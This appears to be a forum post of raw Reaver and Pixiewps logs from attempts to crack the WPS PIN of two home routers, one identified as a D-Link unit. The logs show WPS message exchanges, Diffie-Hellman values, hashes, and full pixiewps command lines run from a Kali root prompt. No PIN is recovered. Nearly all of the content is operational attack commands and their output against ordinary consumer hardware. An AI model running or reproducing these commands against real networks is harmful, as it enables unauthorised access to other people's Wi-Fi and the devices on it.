    WPS: Enrollee RF Bands 0x2
    WPS: Enrollee Association State 0
    WPS: Device Password ID 0
    WPS: Enrollee Configuration Error 0
    WPS: OS Version 10000000
    WPS: M1 Processed
    WPS: dev_pw_id checked
    WPS: PBC Checked
    WPS: Entering State SEND_M2
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): 01 42 17 e4 d7 d7 d8 0c 3f f7 90 03 05 9f 47 85
    WPS: UUID-R - hexdump(len=16): a2 52 65 da 4e 46 4d cc c2 9e 93 4d 23 8b cf 6d
    WPS: Building Message M2
    WPS:  * Version
    WPS:  * Message Type (5)
    WPS:  * Enrollee Nonce
    WPS:  * Registrar Nonce
    WPS:  * UUID-R
    WPS:  * Public Key
    WPS: Generate new DH keys
    DH:  private value - hexdump(len=192): 85 7e a7 22 8a 1a 4e d5 7d 1d 3f  7f  e5 b9 a5 8d 11 16 74 f2 05 aa cf ed f9 f7 24 26 a3 59 dd 68 32 f1 6a  13  59 73 bc 9d 1a 79 db 55 23 36 3e 55 14 77 30 cd f5 27 e3 73 73 8d  db ba  2d 6a 0b 03 20 8b 9e 11 6a 40 2a f3 ab 99 da b8 7b 54 1d 11 6a 42  95 24  86 01 14 28 45 6f 6e 4b 30 42 eb df d3 64 15 76 50 b6 7d 69 db  1d fc 45  09 7f be 6b 58 17 0a 07 2d 6c 0c 40 ce ad 6c 2d f4 11 bb d0 68  0d 38 21  ae 19 ef 34 e5 84 ed a5 f4 27 c4 d0 3d 33 13 ce 25 8b c1 8a  a3 d1 f2 a6  00 a5 b4 4a 79 9a 44 6f 63 80 16 6b 6a 55 06 ad 17 cc ea 9e  76 05 49 98  37 60 12 4a 89 42 b4 fa cd fe 7d 71
    DH: public value -  hexdump(len=192): 61 68 31 8e b6 a1 b1 8b e7 88 80  b1 4a 34 34 53 13 1f  b1 c2 39 11 57 29 83 c5 98 48 51 e4 f7 3e dd 27 db  68 51 51 77 df 0e 3b  a4 92 37 1b 89 be 85 96 06 1f e7 99 7a 44 52 26  4d 45 aa 91 ec 8b b8 fe  b8 81 0f 34 5c d4 b1 c9 84 63 83 c6 84 32 e4 8a  83 07 25 72 97 3e 2b 8d  a5 e1 d0 7c c8 28 0e 94 17 4d a9 cc 98 a8 25  22 20 98 5a 11 e1 7c 22 13  6b fd 30 be 69 16 67 f4 e3 18 6b 52 ab 58 ec  46 6a 5d 7a 96 63 46 b7 42  62 c4 5c 57 17 57 01 79 66 ba 55 3d 29 8a  c4 86 66 0e f3 bc d4 26 73 ca  cb 80 c8 25 ee 52 80 9f 9a 9a 54 75 86 98  5d 13 c3 e8 d8 47 fd 99 2d 82  8d 4f c6 ba e8 2a
    WPS: DH Private Key - hexdump(len=192): 85 7e a7 22  8a 1a 4e d5 7d 1d  3f 7f e5 b9 a5 8d 11 16 74 f2 05 aa cf ed f9 f7 24 26  a3 59 dd 68 32 f1  6a 13 59 73 bc 9d 1a 79 db 55 23 36 3e 55 14 77 30 cd  f5 27 e3 73 73  8d db ba 2d 6a 0b 03 20 8b 9e 11 6a 40 2a f3 ab 99 da b8  7b 54 1d 11 6a  42 95 24 86 01 14 28 45 6f 6e 4b 30 42 eb df d3 64 15 76  50 b6 7d 69  db 1d fc 45 09 7f be 6b 58 17 0a 07 2d 6c 0c 40 ce ad 6c 2d  f4 11 bb d0  68 0d 38 21 ae 19 ef 34 e5 84 ed a5 f4 27 c4 d0 3d 33 13 ce  25 8b c1  8a a3 d1 f2 a6 00 a5 b4 4a 79 9a 44 6f 63 80 16 6b 6a 55 06 ad  17 cc ea  9e 76 05 49 98 37 60 12 4a 89 42 b4 fa cd fe 7d 71
    WPS: DH  own Public Key - hexdump(len=192): 61 68 31 8e b6 a1 b1 8b e7  88 80 b1  4a 34 34 53 13 1f b1 c2 39 11 57 29 83 c5 98 48 51 e4 f7 3e dd  27 db 68  51 51 77 df 0e 3b a4 92 37 1b 89 be 85 96 06 1f e7 99 7a 44  52 26 4d 45  aa 91 ec 8b b8 fe b8 81 0f 34 5c d4 b1 c9 84 63 83 c6 84 32  e4 8a 83 07  25 72 97 3e 2b 8d a5 e1 d0 7c c8 28 0e 94 17 4d a9 cc 98  a8 25 22 20 98  5a 11 e1 7c 22 13 6b fd 30 be 69 16 67 f4 e3 18 6b 52 ab  58 ec 46 6a 5d  7a 96 63 46 b7 42 62 c4 5c 57 17 57 01 79 66 ba 55 3d  29 8a c4 86 66 0e  f3 bc d4 26 73 ca cb 80 c8 25 ee 52 80 9f 9a 9a 54 75  86 98 5d 13 c3 e8  d8 47 fd 99 2d 82 8d 4f c6 ba e8 2a
    WPS: DH Private Key -  hexdump(len=192): 85 7e a7 22 8a 1a 4e d5 7d 1d  3f 7f e5 b9 a5 8d 11 16  74 f2 05 aa cf ed f9 f7 24 26 a3 59 dd 68 32 f1  6a 13 59 73 bc 9d 1a 79  db 55 23 36 3e 55 14 77 30 cd f5 27 e3 73 73  8d db ba 2d 6a 0b 03 20 8b  9e 11 6a 40 2a f3 ab 99 da b8 7b 54 1d 11 6a  42 95 24 86 01 14 28 45 6f  6e 4b 30 42 eb df d3 64 15 76 50 b6 7d 69  db 1d fc 45 09 7f be 6b 58 17  0a 07 2d 6c 0c 40 ce ad 6c 2d f4 11 bb d0  68 0d 38 21 ae 19 ef 34 e5 84  ed a5 f4 27 c4 d0 3d 33 13 ce 25 8b c1  8a a3 d1 f2 a6 00 a5 b4 4a 79 9a  44 6f 63 80 16 6b 6a 55 06 ad 17 cc ea  9e 76 05 49 98 37 60 12 4a 89 42  b4 fa cd fe 7d 71
    WPS: DH peer Public Key - hexdump(len=192): d0 14  1b 15 65 6e 96 b8 5f  ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28  c0 e1 ba f8 cf 91 66  43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25  5b e5 a8 77 0e 1f  a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63  d1 af 1d b0 c4 81  ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13  2a ea 2a 36 84  ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13  9d 77 f0 ac 58  07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa  8d d8 d6 61  be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92  17 76 0b 75  c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
    DH:  shared key - hexdump(len=192): d5 ef c1 da 43 0a a2 2c 86 53 60 fb  7d  e7 ea 64 b8 48 15 3d 58 1f 49 fe 60 e3 4e 51 73 fa 22 9d f5 91 fe ea  5b  82 bf 02 20 0d 62 a4 d5 87 19 ce 9d b2 ce fc ca f3 8e 27 21 a4 9b  57 6a  bf a8 cc 45 57 3c c1 35 fa dd bc 1f 6b 7b a9 01 e2 8e 87 42 b0 6d  72 26  04 2c 7b 3c 9c 43 f8 5f fa 3f 5c 49 72 61 87 67 1a 09 71 6c b3  16 02 83  85 6f 61 7f 07 31 ef 84 11 cb 45 6e e0 b2 64 64 6a 40 53 70 08  3b ef 8b  cd f8 18 80 8d c4 03 98 83 af 55 22 5e 32 46 73 c6 6d d6 7f  12 cc fe c5  38 14 53 bb 0c b6 49 08 d1 6e 4a c2 a5 c4 8a 38 bc b9 de 51  6f 41 d6 36  24 fd 2d ae 78 da 4b 7a 51 1e 88
    WPS: DH shared key -  hexdump(len=192): d5 ef c1 da 43 0a a2 2c 86 53 60  fb 7d e7 ea 64 b8 48  15 3d 58 1f 49 fe 60 e3 4e 51 73 fa 22 9d f5 91  fe ea 5b 82 bf 02 20 0d  62 a4 d5 87 19 ce 9d b2 ce fc ca f3 8e 27 21 a4  9b 57 6a bf a8 cc 45 57  3c c1 35 fa dd bc 1f 6b 7b a9 01 e2 8e 87 42  b0 6d 72 26 04 2c 7b 3c 9c  43 f8 5f fa 3f 5c 49 72 61 87 67 1a 09 71 6c  b3 16 02 83 85 6f 61 7f 07  31 ef 84 11 cb 45 6e e0 b2 64 64 6a 40 53  70 08 3b ef 8b cd f8 18 80 8d  c4 03 98 83 af 55 22 5e 32 46 73 c6 6d d6  7f 12 cc fe c5 38 14 53 bb 0c  b6 49 08 d1 6e 4a c2 a5 c4 8a 38 bc b9  de 51 6f 41 d6 36 24 fd 2d ae 78  da 4b 7a 51 1e 88
    WPS: DHKey - hexdump(len=32): 4a 3b 5d 85 4e 40 bd 4f 38 27 06 6a 5a 9f 80 fb 9d 27 dd b6 21 ef ac 13 7e 52 ff e8 8c ec 30 4f
    WPS: KDK - hexdump(len=32): f9 5d b0 3a d6 b8 4e 84 c7 57 a0 c4 d2 bc d5 bd 4f 2f 2e 55 91 25 40 19 7f b8 33 54 b7 99 04 f6
    WPS: AuthKey - hexdump(len=32): 24 2c c4 39 5c 80 52 2e db dc 28 7a 4d 28 0f 7e d3 b3 c4 ca 98 e5 26 b7 5e 20 e0 6c c9 01 39 e3
    WPS: KeyWrapKey - hexdump(len=16): ba d7 c8 bd 40 6d 69 44 d5 ea 4f 82 02 0a 2b 4a
    WPS: EMSK - hexdump(len=32): 61 bf f1 c9 cd 6d 4e 91 18 98 fe d4 ab d3 ee 3a 23 e1 98 ad 20 82 9e 21 ed 53 87 bd e6 b0 14 2f
    WPS:  * Authentication Type Flags
    WPS:  * Encryption Type Flags
    WPS:  * Connection Type Flags
    WPS:  * Config Methods (8c)
    WPS:  * Manufacturer
    WPS:  * Model Name
    WPS:  * Model Number
    WPS:  * Serial Number
    WPS:  * Primary Device Type
    WPS:  * Device Name
    WPS:  * RF Bands (0)
    WPS:  * Association State
    WPS:  * Configuration Error (0)
    WPS:  * Device Password ID (0)
    WPS:  * OS Version
    WPS:  * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    WPS: Processing received message (len=124 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M3
    WPS: E-Hash1 - hexdump(len=32): 7a 7c 07 1e 89 8e 1c f6 70 6c 63 19 5a a8 43 fb e9 c3 db 0d 6d 29 d9 70 d1 1b e4 70 12 0b e6 11
    WPS: E-Hash2 - hexdump(len=32): db 62 95 83 3b e0 ce bc ba db c2 e0 1b cf aa e3 1f 68 3c c2 77 3f 4c 20 1f 8f ae 2b 73 0b 52 52
    executing  pixiewps -e   d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b   -s 7a7c071e898e1cf6706c63195aa843fbe9c3db0d6d29d970d11be470120be611 -z   db6295833be0cebcbadbc2e01bcfaae31f683cc2773f4c201f8fae2b730b5252 -a   242cc4395c80522edbdc287a4d280f7ed3b3c4ca98e526b75e20e06cc90139e3 -n   ce1219309ec2dc9bd33a70eef846395b -r   6168318eb6a1b18be78880b14a343453131fb1c23911572983c5984851e4f73edd27db68515177df0e3ba492371b89be8596061fe7997a4452264d45aa91ec8bb8feb8810f345cd4b1c9846383c68432e48a83072572973e2b8da5e1d07cc8280e94174da9cc98a8252220985a11e17c22136bfd30be691667f4e3186b52ab58ec466a5d7a966346b74262c45c571757017966ba553d298ac486660ef3bcd42673cacb80c825ee52809f9a9a547586985d13c3e8d847fd992d828d4fc6bae82a
    
     Pixiewps 1.4
    
     [-] WPS pin not found!
    
     [*] Time taken: 0 s 57 ms
    __________________________________________________ __________________________-

    Code:
    root@kali:~#  pixiewps -e   d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b   -s 7a7c071e898e1cf6706c63195aa843fbe9c3db0d6d29d970d11be470120be611 -z   db6295833be0cebcbadbc2e01bcfaae31f683cc2773f4c201f8fae2b730b5252 -a   242cc4395c80522edbdc287a4d280f7ed3b3c4ca98e526b75e20e06cc90139e3 -n   ce1219309ec2dc9bd33a70eef846395b -r   6168318eb6a1b18be78880b14a343453131fb1c23911572983c5984851e4f73edd27db68515177df0e3ba492371b89be8596061fe7997a4452264d45aa91ec8bb8feb8810f345cd4b1c9846383c68432e48a83072572973e2b8da5e1d07cc8280e94174da9cc98a8252220985a11e17c22136bfd30be691667f4e3186b52ab58ec466a5d7a966346b74262c45c571757017966ba553d298ac486660ef3bcd42673cacb80c825ee52809f9a9a547586985d13c3e8d847fd992d828d4fc6bae82a   -f
    
     Pixiewps 1.4
    
     [-] WPS pin not found!
    
     [*] Time taken: 0 s 52 ms
    NOW i tried with another router
    WASH Data :
    Code:
    "bssid"  : "54:B8:0A:15:EA:E0", "essid" : "D-Link 11n AP 2.4G", "channel" : 3,  "rssi" : -70, "vendor_oui" : "00E04C", "wps_version" : 32, "wps_state" :  2, "wps_locked" : 2, "wps_manufacturer" : "D-Link Corp.",  "wps_model_name" : "RTL8xxx", "wps_model_number" : "EV-2010-09-20",  "wps_device_name" : "RTL8196d", "wps_serial" : "123456789012347",  "wps_uuid" : "112233445566778899aa54b80a15eae0", "wps_response_type" :  "03", "wps_primary_device_type" : "00060050f2040001",  "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}
    
    
    Reaver v1.6.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    [+] Switching wlan0mon to channel 3
    [?] Restore previous session for 54:B8:0A:15:EA:E0? [n/Y] n
    [+] Waiting for beacon from 54:B8:0A:15:EA:E0
    [+] Received beacon from 54:B8:0A:15:EA:E0
    [+] Vendor: RealtekS
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
         31 32 33 34 35 36 37 30                           12345670        
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:333
    send_packet called from authenticate() 80211.c:364
    [+] Sending authentication request
    [!] Found packet with bad FCS, skipping...
    send_packet called from associate() 80211.c:417
    [+] Sending association request
    send_packet called from resend_last_packet() send.c:161
    [+] Associated with 54:B8:0A:15:EA:E0 (ESSID: D-Link 11n AP 2.4G)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=412 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): 11 22 33 44 55 66 77 88 99 aa 54 b8 0a 15 ea e0
    WPS: Enrollee MAC Address 54:b8:0a:15:ea:e0
    WPS: Enrollee Nonce - hexdump(len=16): 3d 0c 07 f9 18 2a 7e e7 71 fe 90 63 7b 31 b3 2a
    WPS: Enrollee Authentication Type flags 0x21
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0x9
    WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x2688 [Display] [PBC]
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=12):
         44 2d 4c 69 6e 6b 20 43 6f 72 70 2e               D-Link Corp.    
    WPS: Model Name - hexdump_ascii(len=7):
         52 54 4c 38 78 78 78                              RTL8xxx         
    WPS: Model Number - hexdump_ascii(len=13):
         45 56 2d 32 30 31 30 2d 30 39 2d 32 30            EV-2010-09-20   
    WPS: Serial Number - hexdump_ascii(len=15):
         31 32 33 34 35 36 37 38 39 30 31 32 33 34 37      123456789012347 
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=8):
         52 54 4c 38 31 39 36 64                           RTL8196d        
    WPS: Enrollee RF Bands 0x1
    WPS: Enrollee Association State 0
    WPS: Device Password ID 0
    WPS: Enrollee Configuration Error 0
    WPS: OS Version 10000000
    WPS: M1 Processed
    WPS: dev_pw_id checked
    WPS: PBC Checked
    WPS: Entering State SEND_M2
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): 90 39 cd 10 c2 7a 78 37 91 65 8c a1 c8 38 a4 8d
    WPS: UUID-R - hexdump(len=16): f1 4e 45 8f 7c 4d d6 d4 bd 81 2c 95 22 d2 11 46
    WPS: Building Message M2
    WPS:  * Version
    WPS:  * Message Type (5)
    WPS:  * Enrollee Nonce
    WPS:  * Registrar Nonce
    WPS:  * UUID-R
    WPS:  * Public Key
    WPS: Generate new DH keys
    DH:  private value - hexdump(len=192): 74 81 06 e6 c3 c1 1d e6 81 ab c6 99  b8 47 33 2a c5 17 89 f6 f1 87 c5 b2 9d 72 bf 86 98 11 08 13 82 eb 45 b5  9a 6f 63 bb 33 a9 4d 1c 4a 23 f3 f6 3e d3 64 4e 3e 27 75 58 42 b7 97 ea  58 ab 26 2a 97 80 72 94 db 6e d3 5e 90 bd af 5b 56 5a 2d c7 dc 2a 51 2d  3b c7 3d 29 c5 7e 03 49 c5 ea 0d ae 7c f2 30 fc 30 34 6c 49 b8 8a d6 95  3d 4f 36 13 19 54 2a 38 c3 38 55 1a c0 96 f2 3c 8b 28 77 de a6 7b e4 f5  ee 4e 79 87 ba a1 30 37 c9 8a 99 ef 89 13 6f 9a f2 dc 68 5d ce a3 56 d0  ed 67 83 70 08 77 ab 7e 79 dd c8 3a 36 2d a9 dd 3b 85 2b da 9c fc 67 54  e3 2f 85 d4 9a c5 e5 0f 9c 56 69 8d
    DH: public value -  hexdump(len=192): bf 5c b5 1a 82 d1 f8 6e 10 b6 7b b1 98 3b 86 98 28 e5  ed 0b 6c 94 32 55 0c 35 29 1e ee ea 0d 73 cc 8f f4 7c 15 7b b2 5a 42 ba  4f 39 3c 66 38 95 cc 7e eb ae 48 7a 91 45 56 ef 0f 18 10 54 01 3f bb c3  b1 8d b6 d9 03 48 2b c2 57 ad b1 f2 7d 41 7e 71 d3 a3 7e 93 6d b6 8e e8  59 7c 98 54 b3 c8 55 f0 03 2b 96 f1 1c 92 fa 75 17 95 9f 54 43 1a da b1  15 31 2a 3f 4f 2b 01 2b 12 ce c8 0f f6 c6 53 ba 27 17 94 83 fc 29 06 e0  5c 9f 54 c9 0a 8e ad f9 28 39 10 20 17 a5 b4 44 be 7f 54 f2 2d b0 94 f9  e0 8f 73 54 cf fe b6 e8 a8 b5 eb 68 93 35 20 c5 96 82 65 a2 13 5c ed 88  c5 f7 9f 4b 42 2d
    WPS: DH Private Key - hexdump(len=192): 74 81 06 e6  c3 c1 1d e6 81 ab c6 99 b8 47 33 2a c5 17 89 f6 f1 87 c5 b2 9d 72 bf 86  98 11 08 13 82 eb 45 b5 9a 6f 63 bb 33 a9 4d 1c 4a 23 f3 f6 3e d3 64 4e  3e 27 75 58 42 b7 97 ea 58 ab 26 2a 97 80 72 94 db 6e d3 5e 90 bd af 5b  56 5a 2d c7 dc 2a 51 2d 3b c7 3d 29 c5 7e 03 49 c5 ea 0d ae 7c f2 30 fc  30 34 6c 49 b8 8a d6 95 3d 4f 36 13 19 54 2a 38 c3 38 55 1a c0 96 f2 3c  8b 28 77 de a6 7b e4 f5 ee 4e 79 87 ba a1 30 37 c9 8a 99 ef 89 13 6f 9a  f2 dc 68 5d ce a3 56 d0 ed 67 83 70 08 77 ab 7e 79 dd c8 3a 36 2d a9 dd  3b 85 2b da 9c fc 67 54 e3 2f 85 d4 9a c5 e5 0f 9c 56 69 8d
    WPS: DH  own Public Key - hexdump(len=192): bf 5c b5 1a 82 d1 f8 6e 10 b6 7b b1  98 3b 86 98 28 e5 ed 0b 6c 94 32 55 0c 35 29 1e ee ea 0d 73 cc 8f f4 7c  15 7b b2 5a 42 ba 4f 39 3c 66 38 95 cc 7e eb ae 48 7a 91 45 56 ef 0f 18  10 54 01 3f bb c3 b1 8d b6 d9 03 48 2b c2 57 ad b1 f2 7d 41 7e 71 d3 a3  7e 93 6d b6 8e e8 59 7c 98 54 b3 c8 55 f0 03 2b 96 f1 1c 92 fa 75 17 95  9f 54 43 1a da b1 15 31 2a 3f 4f 2b 01 2b 12 ce c8 0f f6 c6 53 ba 27 17  94 83 fc 29 06 e0 5c 9f 54 c9 0a 8e ad f9 28 39 10 20 17 a5 b4 44 be 7f  54 f2 2d b0 94 f9 e0 8f 73 54 cf fe b6 e8 a8 b5 eb 68 93 35 20 c5 96 82  65 a2 13 5c ed 88 c5 f7 9f 4b 42 2d
    WPS: DH Private Key -  hexdump(len=192): 74 81 06 e6 c3 c1 1d e6 81 ab c6 99 b8 47 33 2a c5 17  89 f6 f1 87 c5 b2 9d 72 bf 86 98 11 08 13 82 eb 45 b5 9a 6f 63 bb 33 a9  4d 1c 4a 23 f3 f6 3e d3 64 4e 3e 27 75 58 42 b7 97 ea 58 ab 26 2a 97 80  72 94 db 6e d3 5e 90 bd af 5b 56 5a 2d c7 dc 2a 51 2d 3b c7 3d 29 c5 7e  03 49 c5 ea 0d ae 7c f2 30 fc 30 34 6c 49 b8 8a d6 95 3d 4f 36 13 19 54  2a 38 c3 38 55 1a c0 96 f2 3c 8b 28 77 de a6 7b e4 f5 ee 4e 79 87 ba a1  30 37 c9 8a 99 ef 89 13 6f 9a f2 dc 68 5d ce a3 56 d0 ed 67 83 70 08 77  ab 7e 79 dd c8 3a 36 2d a9 dd 3b 85 2b da 9c fc 67 54 e3 2f 85 d4 9a c5  e5 0f 9c 56 69 8d
    WPS: DH peer Public Key - hexdump(len=192): d0 14  1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28  c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25  5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63  d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13  2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13  9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa  8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92  17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
    DH:  shared key - hexdump(len=192): 81 72 43 ce 61 5e 06 3e a3 2c 69 ea a7  13 db f4 58 6e 46 b1 9a 16 99 7c 0e f6 e8 f4 75 84 82 c8 2e 24 37 30 82  9e bd 3d b8 66 dc c9 6d 27 b8 27 0d e8 b3 32 1d 8b 78 07 e4 61 f1 33 e5  cf 1a fb 3c 82 ec 8a ed 2c 99 a4 03 fa 5d 2a b6 7d 5d 98 bf ed a4 21 8c  0b 93 5e 37 da 47 0a 74 98 7b e6 e2 c8 1a b0 07 9d 98 11 ae e4 cb 95 3f  ed 0e 28 d5 6d 83 50 f3 f1 f9 43 e8 29 f8 2d 9e b4 7d 9a f1 60 f9 aa 3f  bf 06 e1 89 e9 31 6c 31 4d 60 d7 74 12 58 c7 4e 07 bc 2e 4a b4 07 3f 09  f2 9b 64 55 9e 09 6b 3a c5 f6 d8 12 ed a4 18 70 a5 76 73 58 2c 22 c1 ea  67 57 b0 c1 20 a9 97 3c 69 20 4e
    WPS: DH shared key -  hexdump(len=192): 81 72 43 ce 61 5e 06 3e a3 2c 69 ea a7 13 db f4 58 6e  46 b1 9a 16 99 7c 0e f6 e8 f4 75 84 82 c8 2e 24 37 30 82 9e bd 3d b8 66  dc c9 6d 27 b8 27 0d e8 b3 32 1d 8b 78 07 e4 61 f1 33 e5 cf 1a fb 3c 82  ec 8a ed 2c 99 a4 03 fa 5d 2a b6 7d 5d 98 bf ed a4 21 8c 0b 93 5e 37 da  47 0a 74 98 7b e6 e2 c8 1a b0 07 9d 98 11 ae e4 cb 95 3f ed 0e 28 d5 6d  83 50 f3 f1 f9 43 e8 29 f8 2d 9e b4 7d 9a f1 60 f9 aa 3f bf 06 e1 89 e9  31 6c 31 4d 60 d7 74 12 58 c7 4e 07 bc 2e 4a b4 07 3f 09 f2 9b 64 55 9e  09 6b 3a c5 f6 d8 12 ed a4 18 70 a5 76 73 58 2c 22 c1 ea 67 57 b0 c1 20  a9 97 3c 69 20 4e
    WPS: DHKey - hexdump(len=32): 66 3c 56 aa 7c fd d4 81 ac 93 ca 88 1e bd d4 e1 d6 b5 f3 13 a3 bf 9f 42 83 a7 06 cb 71 37 8f d6
    WPS: KDK - hexdump(len=32): ce 79 eb ec 0b 03 80 c8 d1 46 5f df d0 57 fa 7f 48 8c 1e d0 f2 34 77 14 49 4b cc 73 6a 76 29 c5
    WPS: AuthKey - hexdump(len=32): 25 90 fe aa 96 29 bc 51 c1 7d e8 c1 14 a2 d8 f9 6b 31 6f 28 66 84 c6 b4 7b ee 6e d5 55 65 cf d7
    WPS: KeyWrapKey - hexdump(len=16): b6 57 5b 46 94 f7 56 9f ea 4f 6c 68 2d 70 6f 77
    WPS: EMSK - hexdump(len=32): a4 ae 91 e2 70 55 50 cb 48 25 21 62 96 aa 15 0d 95 ab 1a 0c 42 47 5e dc d6 18 30 b5 32 21 eb 4b
    WPS:  * Authentication Type Flags
    WPS:  * Encryption Type Flags
    WPS:  * Connection Type Flags
    WPS:  * Config Methods (8c)
    WPS:  * Manufacturer
    WPS:  * Model Name
    WPS:  * Model Number
    WPS:  * Serial Number
    WPS:  * Primary Device Type
    WPS:  * Device Name
    WPS:  * RF Bands (0)
    WPS:  * Association State
    WPS:  * Configuration Error (0)
    WPS:  * Device Password ID (0)
    WPS:  * OS Version
    WPS:  * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=124 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M3
    WPS: E-Hash1 - hexdump(len=32): 0c c6 32 d2 09 fc c3 00 61 b5 4e 6c ad b9 5e bc 20 f3 68 4a 71 43 71 7f 66 72 a0 fd 56 d1 5d 0b
    WPS: E-Hash2 - hexdump(len=32): ec 58 b7 05 42 9d aa 80 cf 98 df f8 b6 70 a5 af e9 55 c1 39 69 a1 d4 32 83 9e d1 a4 1c f0 df d1
    executing  pixiewps -e  d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b  -s 0cc632d209fcc30061b54e6cadb95ebc20f3684a7143717f6672a0fd56d15d0b -z  ec58b705429daa80cf98dff8b670a5afe955c13969a1d432839ed1a41cf0dfd1 -a  2590feaa9629bc51c17de8c114a2d8f96b316f286684c6b47bee6ed55565cfd7 -n  3d0c07f9182a7ee771fe90637b31b32a -r  bf5cb51a82d1f86e10b67bb1983b869828e5ed0b6c9432550c35291eeeea0d73cc8ff47c157bb25a42ba4f393c663895cc7eebae487a914556ef0f181054013fbbc3b18db6d903482bc257adb1f27d417e71d3a37e936db68ee8597c9854b3c855f0032b96f11c92fa7517959f54431adab115312a3f4f2b012b12cec80ff6c653ba27179483fc2906e05c9f54c90a8eadf92839102017a5b444be7f54f22db094f9e08f7354cffeb6e8a8b5eb68933520c5968265a2135ced88c5f79f4b422d
    
     Pixiewps 1.4
    
     [-] WPS pin not found!
    
     [*] Time taken: 0 s 61 ms
    
     [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
    Code:
